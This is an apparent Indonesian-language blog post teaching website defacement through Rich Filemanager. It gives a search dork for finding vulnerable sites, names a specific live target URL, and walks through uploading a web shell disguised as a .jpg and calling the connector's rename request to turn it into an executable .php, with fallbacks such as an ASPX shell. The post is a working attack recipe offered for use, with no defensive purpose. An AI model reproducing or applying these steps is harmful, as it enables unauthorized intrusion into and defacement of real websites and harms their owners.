Tutorial deface with Rich Filemanager
Rich Filemanager
dork: /filemanager/userfiles (Kembangin anjg jan manja)
live target: http://bxbin.com/BxFlipTV/assets/filemanager/
Pilih salah satu y
1.Tamper data (Target yang w kasih ga support tamper)
2.Rename, jadi u upload shell dlu formatnya jpg abis itu kasih exploit kek gini
/filemanager/connectors/php/filemanager.php?mode=rename&old=/BxFlipTV/assets/filemanager/userfiles/shell.jpg&new=shell.php
Nah pas bagian old dibawah ini u ganti path sitenya, tapi kadang ada yang langsung gini
old=/userfiles/shell.jpg
akses shell? /filemanager/userfiles/shell.php
Gabisa up shell? Atau shell pas diakses ga anu, coba make shell aspx kali aja serverny ga install php.
Tapi kalo emang gabisa semua, coba tamper file txt u atau script kek ke dir home, hapus pada path uploadnya
sc:mamad 0N3RID3R
thx:Indonesia To World
Comments
Post a Comment